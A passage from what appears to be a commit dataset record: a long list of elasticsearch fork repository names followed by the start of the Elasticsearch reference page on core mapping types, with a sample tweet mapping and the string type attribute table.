/elasticsearch,lightslife\/elasticsearch,onegambler\/elasticsearch,huypx1292\/elasticsearch,adrianbk\/elasticsearch,lzo\/elasticsearch-1,shreejay\/elasticsearch,huanzhong\/elasticsearch,scorpionvicky\/elasticsearch,lzo\/elasticsearch-1,sdauletau\/elasticsearch,btiernay\/elasticsearch,MisterAndersen\/elasticsearch,elasticdog\/elasticsearch,SergVro\/elasticsearch,jango2015\/elasticsearch,djschny\/elasticsearch,kevinkluge\/elasticsearch,markllama\/elasticsearch,awislowski\/elasticsearch,mohit\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,Shekharrajak\/elasticsearch,lks21c\/elasticsearch,markllama\/elasticsearch,Microsoft\/elasticsearch,ivansun1010\/elasticsearch,loconsolutions\/elasticsearch,jchampion\/elasticsearch,Helen-Zhao\/elasticsearch,Chhunlong\/elasticsearch,hechunwen\/elasticsearch,Shekharrajak\/elasticsearch,iamjakob\/elasticsearch,yuy168\/elasticsearch,cwurm\/elasticsearch,fooljohnny\/elasticsearch,ajhalani\/elasticsearch,sneivandt\/elasticsearch,Brijeshrpatel9\/elasticsearch,sposam\/elasticsearch,kaneshin\/elasticsearch,amaliujia\/elasticsearch,khiraiwa\/elasticsearch,iamjakob\/elasticsearch,HarishAtGitHub\/elasticsearch,feiqitian\/elasticsearch,jimczi\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,jprante\/elasticsearch,yuy168\/elasticsearch,ImpressTV\/elasticsearch,sc0ttkclark\/elasticsearch,sc0ttkclark\/elasticsearch,vietlq\/elasticsearch,linglaiyao1314\/elasticsearch,queirozfcom\/elasticsearch,fooljohnny\/elasticsearch,phani546\/elasticsearch,ivansun1010\/elasticsearch,F0lha\/elasticsearch,robin13\/elasticsearch,infusionsoft\/elasticsearch,anti-social\/elasticsearch,feiqitian\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,chirilo\/elasticsearch,kcompher\/elasticsearch,mjason3\/elasticsearch,Fsero\/elasticsearch,hechunwen\/elasticsearch,Stacey-Gammon\/elasticsearch,yuy168\/elasticsearch,codebunt\/elasticsearch,MaineC\/elasticsearch,AndreKR\/elasticsearch,ckclark\/elasticsearch,nezirus\/elasticsearch,jbertouch\/elasticsearch,alexshadow007\/elasticsearch,ThalaivaStars\/OrgRepo1,jchampion\/elasticsearch,aglne\/elasticsearch,kcompher\/elasticsearch,alexshadow007\/elasticsearch,queirozfcom\/elasticsearch,mjhennig\/elasticsearch,iantruslove\/elasticsearch,Flipkart\/elasticsearch,apepper\/elasticsearch,achow\/elasticsearch,schonfeld\/elasticsearch,xpandan\/elasticsearch,btiernay\/elasticsearch,Flipkart\/elasticsearch,mjhennig\/elasticsearch,micpalmia\/elasticsearch,andrejserafim\/elasticsearch,skearns64\/elasticsearch,hydro2k\/elasticsearch,alexshadow007\/elasticsearch,springning\/elasticsearch,yanjunh\/elasticsearch,mjason3\/elasticsearch,wittyameta\/elasticsearch,gfyoung\/elasticsearch,girirajsharma\/elasticsearch,dpursehouse\/elasticsearch,markharwood\/elasticsearch,wbowling\/elasticsearch,18098924759\/elasticsearch,elasticdog\/elasticsearch,PhaedrusTheGreek\/elasticsearch,KimTaehee\/elasticsearch,AshishThakur\/elasticsearch,jprante\/elasticsearch,ulkas\/elasticsearch,alexshadow007\/elasticsearch,mmaracic\/elasticsearch,aglne\/elasticsearch,sdauletau\/elasticsearch,alexshadow007\/elasticsearch,TonyChai24\/ESSource,Clairebi\/ElasticsearchClone,davidvgalbraith\/elasticsearch,avikurapati\/elasticsearch,vietlq\/elasticsearch,PhaedrusTheGreek\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,rajanm\/elasticsearch,mnylen\/elasticsearch,kkirsche\/elasticsearch,btiernay\/elasticsearch,mute\/elasticsearch,pranavraman\/elasticsearch,GlenRSmith\/elasticsearch,amaliujia\/elasticsearch,kunallimaye\/elasticsearch,nknize\/elasticsearch,MjAbuz\/elasticsearch,iacdingping\/elasticsearch,andrejserafim\/elasticsearch,episerver\/elasticsearch,hirdesh2008\/elasticsearch,glefloch\/elasticsearch,amit-shar\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,andrestc\/elasticsearch,ricardocerq\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,hafkensite\/elasticsearch,kaneshin\/elasticsearch,beiske\/elasticsearch,kunallimaye\/elasticsearch,jeteve\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra5-rc,MjAbuz\/elasticsearch,rhoml\/elasticsearch,lchennup\/elasticsearch,C-Bish\/elasticsearch,ajhalani\/elasticsearch,tkssharma\/elasticsearch,linglaiyao1314\/elasticsearch,lks21c\/elasticsearch,dataduke\/elasticsearch,maddin2016\/elasticsearch,wimvds\/elasticsearch,hanst\/elasticsearch,JackyMai\/elasticsearch,obourgain\/elasticsearch,ImpressTV\/elasticsearch,combinatorist\/elasticsearch,amaliujia\/elasticsearch,MisterAndersen\/elasticsearch,NBSW\/elasticsearch,EasonYi\/elasticsearch,myelin\/elasticsearch,huanzhong\/elasticsearch,pranavraman\/elasticsearch,pritishppai\/elasticsearch,zeroctu\/elasticsearch,StefanGor\/elasticsearch,pablocastro\/elasticsearch,drewr\/elasticsearch,lmtwga\/elasticsearch,lks21c\/elasticsearch,YosuaMichael\/elasticsearch,kaneshin\/elasticsearch,Fsero\/elasticsearch,nazarewk\/elasticsearch,beiske\/elasticsearch,gmarz\/elasticsearch,kingaj\/elasticsearch,girirajsharma\/elasticsearch,phani546\/elasticsearch,Charlesdong\/elasticsearch,linglaiyao1314\/elasticsearch,knight1128\/elasticsearch,fforbeck\/elasticsearch,ulkas\/elasticsearch,jbertouch\/elasticsearch,pozhidaevak\/elasticsearch,mgalushka\/elasticsearch,overcome\/elasticsearch,boliza\/elasticsearch,xpandan\/elasticsearch,milodky\/elasticsearch,jsgao0\/elasticsearch,iantruslove\/elasticsearch,Uiho\/elasticsearch,kcompher\/elasticsearch,wbowling\/elasticsearch,ricardocerq\/elasticsearch,Rygbee\/elasticsearch,vietlq\/elasticsearch,hanswang\/elasticsearch,lydonchandra\/elasticsearch,beiske\/elasticsearch,YosuaMichael\/elasticsearch,koxa29\/elasticsearch,xingguang2013\/elasticsearch,ivansun1010\/elasticsearch,weipinghe\/elasticsearch,Brijeshrpatel9\/elasticsearch,jaynblue\/elasticsearch,humandb\/elasticsearch,strapdata\/elassandra5-rc,iamjakob\/elasticsearch,fforbeck\/elasticsearch,sauravmondallive\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Asimov4\/elasticsearch,brandonkearby\/elasticsearch,kingaj\/elasticsearch,rlugojr\/elasticsearch,tahaemin\/elasticsearch,vingupta3\/elasticsearch,Fsero\/elasticsearch,mikemccand\/elasticsearch,sposam\/elasticsearch,Widen\/elasticsearch,Widen\/elasticsearch,AshishThakur\/elasticsearch,AleksKochev\/elasticsearch,fernandozhu\/elasticsearch,truemped\/elasticsearch,pranavraman\/elasticsearch,hirdesh2008\/elasticsearch,naveenhooda2000\/elasticsearch,Siddartha07\/elasticsearch,Kakakakakku\/elasticsearch,janmejay\/elasticsearch,sarwarbhuiyan\/elasticsearch,mapr\/elasticsearch,lzo\/elasticsearch-1,mjason3\/elasticsearch,ydsakyclguozi\/elasticsearch,heng4fun\/elasticsearch,s1monw\/elasticsearch,adrianbk\/elasticsearch,golubev\/elasticsearch,yongminxia\/elasticsearch,himanshuag\/elasticsearch,loconsolutions\/elasticsearch,ouyangkongtong\/elasticsearch,hydro2k\/elasticsearch,fekaputra\/elasticsearch,tcucchietti\/elasticsearch,sauravmondallive\/elasticsearch,Chhunlong\/elasticsearch,dylan8902\/elasticsearch,wbowling\/elasticsearch,smflorentino\/elasticsearch,schonfeld\/elasticsearch,lmtwga\/elasticsearch,rento19962\/elasticsearch,nellicus\/elasticsearch,mapr\/elasticsearch,mjhennig\/elasticsearch,himanshuag\/elasticsearch,knight1128\/elasticsearch,wangtuo\/elasticsearch,thecocce\/elasticsearch,dpursehouse\/elasticsearch,AndreKR\/elasticsearch,janmejay\/elasticsearch,humandb\/elasticsearch,andrejserafim\/elasticsearch,alexbrasetvik\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra-test,wuranbo\/elasticsearch,djschny\/elasticsearch,cnfire\/elasticsearch-1,tsohil\/elasticsearch,SergVro\/elasticsearch,khiraiwa\/elasticsearch,truemped\/elasticsearch,pritishppai\/elasticsearch,Shepard1212\/elasticsearch,szroland\/elasticsearch,chrismwendt\/elasticsearch,tcucchietti\/elasticsearch,xingguang2013\/elasticsearch,acchen97\/elasticsearch,schonfeld\/elasticsearch,davidvgalbraith\/elasticsearch,mmaracic\/elasticsearch,brwe\/elasticsearch,18098924759\/elasticsearch,kubum\/elasticsearch,tkssharma\/elasticsearch,fernandozhu\/elasticsearch,likaiwalkman\/elasticsearch,onegambler\/elasticsearch,kalburgimanjunath\/elasticsearch,xingguang2013\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,Widen\/elasticsearch,opendatasoft\/elasticsearch,MetSystem\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,mbrukman\/elasticsearch,nilabhsagar\/elasticsearch,JervyShi\/elasticsearch,yynil\/elasticsearch,weipinghe\/elasticsearch,hirdesh2008\/elasticsearch,uschindler\/elasticsearch,mm0\/elasticsearch,NBSW\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,zeroctu\/elasticsearch,artnowo\/elasticsearch,petabytedata\/elasticsearch,nellicus\/elasticsearch,Brijeshrpatel9\/elasticsearch,hafkensite\/elasticsearch,golubev\/elasticsearch,huypx1292\/elasticsearch,abibell\/elasticsearch,Uiho\/elasticsearch,PhaedrusTheGreek\/elasticsearch,elancom\/elasticsearch,xpandan\/elasticsearch,elancom\/elasticsearch,hafkensite\/elasticsearch,qwerty4030\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,pranavraman\/elasticsearch,ImpressTV\/elasticsearch,fernandozhu\/elasticsearch,beiske\/elasticsearch,avikurapati\/elasticsearch,StefanGor\/elasticsearch,vingupta3\/elasticsearch,anti-social\/elasticsearch,easonC\/elasticsearch,kkirsche\/elasticsearch,koxa29\/elasticsearch,kevinkluge\/elasticsearch,achow\/elasticsearch,mnylen\/elasticsearch,tsohil\/elasticsearch,yanjunh\/elasticsearch,vietlq\/elasticsearch,sreeramjayan\/elasticsearch,geidies\/elasticsearch,masterweb121\/elasticsearch,sneivandt\/elasticsearch,wangyuxue\/elasticsearch,thecocce\/elasticsearch,rmuir\/elasticsearch,i-am-Nathan\/elasticsearch,petabytedata\/elasticsearch,anti-social\/elasticsearch,wittyameta\/elasticsearch,pozhidaevak\/elasticsearch,hanst\/elasticsearch,TonyChai24\/ESSource,amit-shar\/elasticsearch,spiegela\/elasticsearch,overcome\/elasticsearch,vingupta3\/elasticsearch,lydonchandra\/elasticsearch,zeroctu\/elasticsearch,weipinghe\/elasticsearch,zkidkid\/elasticsearch,ivansun1010\/elasticsearch,smflorentino\/elasticsearch,pablocastro\/elasticsearch,schonfeld\/elasticsearch,codebunt\/elasticsearch,smflorentino\/elasticsearch,jango2015\/elasticsearch,dylan8902\/elasticsearch,tcucchietti\/elasticsearch,pritishppai\/elasticsearch,iantruslove\/elasticsearch,Chhunlong\/elasticsearch,ckclark\/elasticsearch,bawse\/elasticsearch,mbrukman\/elasticsearch,qwerty4030\/elasticsearch,combinatorist\/elasticsearch,naveenhooda2000\/elasticsearch,mmaracic\/elasticsearch,thecocce\/elasticsearch,obourgain\/elasticsearch,boliza\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexbrasetvik\/elasticsearch,snikch\/elasticsearch,humandb\/elasticsearch,infusionsoft\/elasticsearch,alexkuk\/elasticsearch,micpalmia\/elasticsearch,jimczi\/elasticsearch,trangvh\/elasticsearch,uschindler\/elasticsearch,jbertouch\/elasticsearch,VukDukic\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,AndreKR\/elasticsearch,ThalaivaStars\/OrgRepo1,yongminxia\/elasticsearch,knight1128\/elasticsearch,AndreKR\/elasticsearch,amit-shar\/elasticsearch,jimczi\/elasticsearch,martinstuga\/elasticsearch,18098924759\/elasticsearch,zhiqinghuang\/elasticsearch,lightslife\/elasticsearch,nazarewk\/elasticsearch,SergVro\/elasticsearch,Siddartha07\/elasticsearch,huanzhong\/elasticsearch,humandb\/elasticsearch,lzo\/elasticsearch-1,masterweb121\/elasticsearch,Liziyao\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,hafkensite\/elasticsearch,sdauletau\/elasticsearch,dylan8902\/elasticsearch,geidies\/elasticsearch,anti-social\/elasticsearch,lightslife\/elasticsearch,markwalkom\/elasticsearch,szroland\/elasticsearch,nezirus\/elasticsearch,springning\/elasticsearch,episerver\/elasticsearch,dataduke\/elasticsearch,umeshdangat\/elasticsearch,glefloch\/elasticsearch,franklanganke\/elasticsearch,martinstuga\/elasticsearch,likaiwalkman\/elasticsearch,scorpionvicky\/elasticsearch,snikch\/elasticsearch,AshishThakur\/elasticsearch,diendt\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,khiraiwa\/elasticsearch,wenpos\/elasticsearch,springning\/elasticsearch,sposam\/elasticsearch,phani546\/elasticsearch,nknize\/elasticsearch,kevinkluge\/elasticsearch,heng4fun\/elasticsearch,areek\/elasticsearch,djschny\/elasticsearch,wayeast\/elasticsearch,nilabhsagar\/elasticsearch,masterweb121\/elasticsearch,dataduke\/elasticsearch,dpursehouse\/elasticsearch,JSCooke\/elasticsearch,mute\/elasticsearch,jprante\/elasticsearch,franklanganke\/elasticsearch,nomoa\/elasticsearch,abibell\/elasticsearch,masaruh\/elasticsearch,VukDukic\/elasticsearch,HarishAtGitHub\/elasticsearch,jprante\/elasticsearch,janmejay\/elasticsearch,camilojd\/elasticsearch,Collaborne\/elasticsearch,mbrukman\/elasticsearch,kcompher\/elasticsearch,sc0ttkclark\/elasticsearch,kenshin233\/elasticsearch,davidvgalbraith\/elasticsearch,Kakakakakku\/elasticsearch,Uiho\/elasticsearch,HarishAtGitHub\/elasticsearch,ydsakyclguozi\/elasticsearch,lzo\/elasticsearch-1,MaineC\/elasticsearch,springning\/elasticsearch,ydsakyclguozi\/elasticsearch,jw0201\/elastic,s1monw\/elasticsearch,cwurm\/elasticsearch,wenpos\/elasticsearch,lydonchandra\/elasticsearch,aglne\/elasticsearch,ZTE-PaaS\/elasticsearch,alexkuk\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,huypx1292\/elasticsearch,kkirsche\/elasticsearch,btiernay\/elasticsearch,iantruslove\/elasticsearch,springning\/elasticsearch,palecur\/elasticsearch,amit-shar\/elasticsearch,Stacey-Gammon\/elasticsearch,dongjoon-hyun\/elasticsearch,palecur\/elasticsearch,jeteve\/elasticsearch,KimTaehee\/elasticsearch,acchen97\/elasticsearch,huypx1292\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,YosuaMichael\/elasticsearch,queirozfcom\/elasticsearch,xuzha\/elasticsearch,janmejay\/elasticsearch,yynil\/elasticsearch,nellicus\/elasticsearch,yuy168\/elasticsearch,markwalkom\/elasticsearch,liweinan0423\/elasticsearch,queirozfcom\/elasticsearch,socialrank\/elasticsearch,boliza\/elasticsearch,Helen-Zhao\/elasticsearch,fooljohnny\/elasticsearch,snikch\/elasticsearch,markllama\/elasticsearch,ThalaivaStars\/OrgRepo1,infusionsoft\/elasticsearch,lightslife\/elasticsearch,liweinan0423\/elasticsearch,AshishThakur\/elasticsearch,VukDukic\/elasticsearch,koxa29\/elasticsearch,Uiho\/elasticsearch,coding0011\/elasticsearch,sjohnr\/elasticsearch,sarwarbhuiyan\/elasticsearch,spiegela\/elasticsearch,rmuir\/elasticsearch,Clairebi\/ElasticsearchClone,sdauletau\/elasticsearch,sreeramjayan\/elasticsearch,xuzha\/elasticsearch,iamjakob\/elasticsearch,s1monw\/elasticsearch,slavau\/elasticsearch,Ansh90\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,ouyangkongtong\/elasticsearch,jimhooker2002\/elasticsearch,lchennup\/elasticsearch,iamjakob\/elasticsearch,iantruslove\/elasticsearch,IanvsPoplicola\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,andrestc\/elasticsearch,naveenhooda2000\/elasticsearch,EasonYi\/elasticsearch,skearns64\/elasticsearch,tkssharma\/elasticsearch,Fsero\/elasticsearch,Flipkart\/elasticsearch,JSCooke\/elasticsearch,wuranbo\/elasticsearch,martinstuga\/elasticsearch,wangtuo\/elasticsearch,NBSW\/elasticsearch,jchampion\/elasticsearch,girirajsharma\/elasticsearch,markllama\/elasticsearch,markllama\/elasticsearch,Shepard1212\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,tahaemin\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,zhiqinghuang\/elasticsearch,wangyuxue\/elasticsearch,mrorii\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,mrorii\/elasticsearch,adrianbk\/elasticsearch,milodky\/elasticsearch,MaineC\/elasticsearch,franklanganke\/elasticsearch,adrianbk\/elasticsearch,mute\/elasticsearch,TonyChai24\/ESSource,njlawton\/elasticsearch,uschindler\/elasticsearch,vrkansagara\/elasticsearch,loconsolutions\/elasticsearch,PhaedrusTheGreek\/elasticsearch,yuy168\/elasticsearch,iacdingping\/elasticsearch,geidies\/elasticsearch,mrorii\/elasticsearch,MichaelLiZhou\/elasticsearch,s1monw\/elasticsearch,dylan8902\/elasticsearch,ImpressTV\/elasticsearch,henakamaMSFT\/elasticsearch,mcku\/elasticsearch,fforbeck\/elasticsearch,mapr\/elasticsearch,achow\/elasticsearch,tsohil\/elasticsearch,JervyShi\/elasticsearch,sreeramjayan\/elasticsearch,F0lha\/elasticsearch,mcku\/elasticsearch,mnylen\/elasticsearch,knight1128\/elasticsearch,Ansh90\/elasticsearch,TonyChai24\/ESSource,skearns64\/elasticsearch,TonyChai24\/ESSource,yongminxia\/elasticsearch,strapdata\/elassandra5-rc,milodky\/elasticsearch,Collaborne\/elasticsearch,AleksKochev\/elasticsearch,nazarewk\/elasticsearch,awislowski\/elasticsearch,mikemccand\/elasticsearch,rlugojr\/elasticsearch,elancom\/elasticsearch,mute\/elasticsearch,mkis-\/elasticsearch,drewr\/elasticsearch,MjAbuz\/elasticsearch,beiske\/elasticsearch,Ansh90\/elasticsearch,areek\/elasticsearch,gmarz\/elasticsearch,spiegela\/elasticsearch,pranavraman\/elasticsearch,wayeast\/elasticsearch,apepper\/elasticsearch,karthikjaps\/elasticsearch,pranavraman\/elasticsearch,feiqitian\/elasticsearch,hanswang\/elasticsearch,mikemccand\/elasticsearch,fooljohnny\/elasticsearch,springning\/elasticsearch,infusionsoft\/elasticsearch,Liziyao\/elasticsearch,rmuir\/elasticsearch,nezirus\/elasticsearch,jsgao0\/elasticsearch,kalburgimanjunath\/elasticsearch,boliza\/elasticsearch,mmaracic\/elasticsearch,HonzaKral\/elasticsearch,nomoa\/elasticsearch,sneivandt\/elasticsearch,sscarduzio\/elasticsearch,chirilo\/elasticsearch,kalimatas\/elasticsearch,javachengwc\/elasticsearch,markllama\/elasticsearch,mkis-\/elasticsearch,ckclark\/elasticsearch,kenshin233\/elasticsearch,diendt\/elasticsearch,Collaborne\/elasticsearch,chirilo\/elasticsearch,andrejserafim\/elasticsearch,alexkuk\/elasticsearch,brwe\/elasticsearch,alexbrasetvik\/elasticsearch,obourgain\/elasticsearch,opendatasoft\/elasticsearch,thecocce\/elasticsearch,feiqitian\/elasticsearch,LewayneNaidoo\/elasticsearch,javachengwc\/elasticsearch,HonzaKral\/elasticsearch,yanjunh\/elasticsearch,davidvgalbraith\/elasticsearch,amaliujia\/elasticsearch,gfyoung\/elasticsearch,wittyameta\/elasticsearch,weipinghe\/elasticsearch,caengcjd\/elasticsearch,vvcephei\/elasticsearch,jchampion\/elasticsearch,henakamaMSFT\/elasticsearch,qwerty4030\/elasticsearch,tebriel\/elasticsearch,kenshin233\/elasticsearch,areek\/elasticsearch,hanswang\/elasticsearch,petmit\/elasticsearch,knight1128\/elasticsearch,kubum\/elasticsearch,winstonewert\/elasticsearch,camilojd\/elasticsearch,YosuaMichael\/elasticsearch,wimvds\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra-test,cnfire\/elasticsearch-1,nilabhsagar\/elasticsearch,kaneshin\/elasticsearch,truemped\/elasticsearch,mm0\/elasticsearch,dongjoon-hyun\/elasticsearch,Collaborne\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,kubum\/elasticsearch,rento19962\/elasticsearch,JSCooke\/elasticsearch,vroyer\/elasticassandra,hechunwen\/elasticsearch,KimTaehee\/elasticsearch,tsohil\/elasticsearch,sdauletau\/elasticsearch,brwe\/elasticsearch,lchennup\/elasticsearch,knight1128\/elasticsearch,rajanm\/elasticsearch,vingupta3\/elasticsearch,vrkansagara\/elasticsearch,jimhooker2002\/elasticsearch,abibell\/elasticsearch,weipinghe\/elasticsearch,sarwarbhuiyan\/elasticsearch,javachengwc\/elasticsearch,feiqitian\/elasticsearch,geidies\/elasticsearch,Kakakakakku\/elasticsearch,slavau\/elasticsearch,Flipkart\/elasticsearch,Chhunlong\/elasticsearch,mohit\/elasticsearch,rmuir\/elasticsearch,karthikjaps\/elasticsearch,kkirsche\/elasticsearch,bawse\/elasticsearch,kalburgimanjunath\/elasticsearch,vingupta3\/elasticsearch,huypx1292\/elasticsearch,lmtwga\/elasticsearch,codebunt\/elasticsearch,socialrank\/elasticsearch,mm0\/elasticsearch,wayeast\/elasticsearch,HarishAtGitHub\/elasticsearch,achow\/elasticsearch,spiegela\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kcompher\/elasticsearch,SergVro\/elasticsearch,sjohnr\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,koxa29\/elasticsearch,hanswang\/elasticsearch,Uiho\/elasticsearch,AshishThakur\/elasticsearch,ZTE-PaaS\/elasticsearch,drewr\/elasticsearch,skearns64\/elasticsearch,davidvgalbraith\/elasticsearch,markharwood\/elasticsearch,likaiwalkman\/elasticsearch,sposam\/elasticsearch,strapdata\/elassandra-test,knight1128\/elasticsearch,janmejay\/elasticsearch,tsohil\/elasticsearch,caengcjd\/elasticsearch,Chhunlong\/elasticsearch,dantuffery\/elasticsearch,yynil\/elasticsearch,himanshuag\/elasticsearch,golubev\/elasticsearch,mute\/elasticsearch,polyfractal\/elasticsearch,queirozfcom\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,sscarduzio\/elasticsearch,mcku\/elasticsearch,anti-social\/elasticsearch,Shekharrajak\/elasticsearch,wangtuo\/elasticsearch,chirilo\/elasticsearch,thecocce\/elasticsearch,bawse\/elasticsearch,luiseduardohdbackup\/elasticsearch,MjAbuz\/elasticsearch,Rygbee\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,MichaelLiZhou\/elasticsearch,queirozfcom\/elasticsearch,kingaj\/elasticsearch,robin13\/elasticsearch,cwurm\/elasticsearch,pablocastro\/elasticsearch,artnowo\/elasticsearch,chrismwendt\/elasticsearch,acchen97\/elasticsearch,Charlesdong\/elasticsearch,linglaiyao1314\/elasticsearch,overcome\/elasticsearch,opendatasoft\/elasticsearch,lks21c\/elasticsearch,ImpressTV\/elasticsearch,Fsero\/elasticsearch,likaiwalkman\/elasticsearch,Fsero\/elasticsearch,pablocastro\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,bestwpw\/elasticsearch,caengcjd\/elasticsearch,MjAbuz\/elasticsearch,mgalushka\/elasticsearch,AleksKochev\/elasticsearch,rmuir\/elasticsearch,rhoml\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,njlawton\/elasticsearch,clintongormley\/elasticsearch,achow\/elasticsearch,rlugojr\/elasticsearch,petabytedata\/elasticsearch,Microsoft\/elasticsearch,tebriel\/elasticsearch,lydonchandra\/elasticsearch,strapdata\/elassandra-test,opendatasoft\/elasticsearch,Rygbee\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,diendt\/elasticsearch,luiseduardohdbackup\/elasticsearch,kunallimaye\/elasticsearch,kevinkluge\/elasticsearch,masaruh\/elasticsearch,koxa29\/elasticsearch,clintongormley\/elasticsearch,umeshdangat\/elasticsearch,sreeramjayan\/elasticsearch,polyfractal\/elasticsearch,naveenhooda2000\/elasticsearch,mm0\/elasticsearch,heng4fun\/elasticsearch,likaiwalkman\/elasticsearch,codebunt\/elasticsearch,drewr\/elasticsearch,zeroctu\/elasticsearch,lchennup\/elasticsearch,huanzhong\/elasticsearch,amit-shar\/elasticsearch,lydonchandra\/elasticsearch,himanshuag\/elasticsearch,vrkansagara\/elasticsearch,clintongormley\/elasticsearch,bawse\/elasticsearch,mmaracic\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra5-rc,mjhennig\/elasticsearch,StefanGor\/elasticsearch,sc0ttkclark\/elasticsearch,areek\/elasticsearch,JackyMai\/elasticsearch,sreeramjayan\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,jpountz\/elasticsearch,tkssharma\/elasticsearch,Uiho\/elasticsearch,LeoYao\/elasticsearch,jw0201\/elastic,JackyMai\/elasticsearch,tkssharma\/elasticsearch,apepper\/elasticsearch,YosuaMichael\/elasticsearch,kenshin233\/elasticsearch,IanvsPoplicola\/elasticsearch,wayeast\/elasticsearch,ulkas\/elasticsearch,slavau\/elasticsearch,mbrukman\/elasticsearch,artnowo\/elasticsearch,trangvh\/elasticsearch,diendt\/elasticsearch,ouyangkongtong\/elasticsearch,caengcjd\/elasticsearch,jw0201\/elastic,lmtwga\/elasticsearch,alexkuk\/elasticsearch,himanshuag\/elasticsearch,jaynblue\/elasticsearch,Shepard1212\/elasticsearch,linglaiyao1314\/elasticsearch,sarwarbhuiyan\/elasticsearch,JSCooke\/elasticsearch,ESamir\/elasticsearch,fred84\/elasticsearch,MichaelLiZhou\/elasticsearch,pablocastro\/elasticsearch,likaiwalkman\/elasticsearch,mnylen\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,kaneshin\/elasticsearch,skearns64\/elasticsearch,GlenRSmith\/elasticsearch,hechunwen\/elasticsearch,zeroctu\/elasticsearch,abibell\/elasticsearch,mgalushka\/elasticsearch,uschindler\/elasticsearch,Siddartha07\/elasticsearch,bestwpw\/elasticsearch,jpountz\/elasticsearch,wimvds\/elasticsearch,sauravmondallive\/elasticsearch,fforbeck\/elasticsearch,dataduke\/elasticsearch,jango2015\/elasticsearch,sjohnr\/elasticsearch,shreejay\/elasticsearch,chirilo\/elasticsearch,hafkensite\/elasticsearch,overcome\/elasticsearch,hanswang\/elasticsearch,sneivandt\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra,PhaedrusTheGreek\/elasticsearch,hydro2k\/elasticsearch,jaynblue\/elasticsearch,YosuaMichael\/elasticsearch,davidvgalbraith\/elasticsearch,petabytedata\/elasticsearch,MichaelLiZhou\/elasticsearch,alexkuk\/elasticsearch,truemped\/elasticsearch,khiraiwa\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/core-types.asciidoc","new_file":"docs\/reference\/mapping\/types\/core-types.asciidoc","new_contents":"[[mapping-core-types]]\n=== Core Types\n\nEach JSON field can be mapped to a specific core type. JSON itself\nalready provides us with some typing, with its support for `string`,\n`integer`\/`long`, `float`\/`double`, `boolean`, and `null`.\n\nThe following sample tweet JSON document will be used to explain the\ncore types:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" {\n \"user\" : \"kimchy\",\n \"message\" : \"This is a tweet!\",\n \"postDate\" : \"2009-11-15T14:12:12\",\n \"priority\" : 4,\n \"rank\" : 12.3\n }\n}\n--------------------------------------------------\n\nExplicit mapping for the above JSON tweet can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"user\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"},\n \"message\" : {\"type\" : \"string\", \"null_value\" : \"na\"},\n \"postDate\" : {\"type\" : \"date\"},\n \"priority\" : {\"type\" : \"integer\"},\n \"rank\" : {\"type\" : \"float\"}\n }\n }\n}\n--------------------------------------------------\n\n[float]\n[[string]]\n==== String\n\nThe text based string type is the most basic type, and contains one or\nmore characters. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"message\" : {\n \"type\" : \"string\",\n \"store\" : true,\n \"index\" : \"analyzed\",\n \"null_value\" : \"na\"\n },\n \"user\" : {\n \"type\" : \"string\",\n \"index\" : \"not_analyzed\",\n \"norms\" : {\n \"enabled\" : false\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above mapping defines a `string` `message` property\/field within the\n`tweet` type. The field is stored in the index (so it can later be\nretrieved using selective loading when searching), and it gets analyzed\n(broken down into searchable terms). If the message has a `null` value,\nthen the value that will be stored is `na`. There is also a `string` `user`\nwhich is indexed as-is (not broken down into tokens) and has norms\ndisabled (so that matching this field is a binary decision, no match is\nbetter than another one).\n\nThe following table lists all the attributes that can be used with the\n`string` type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to actually store the field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself 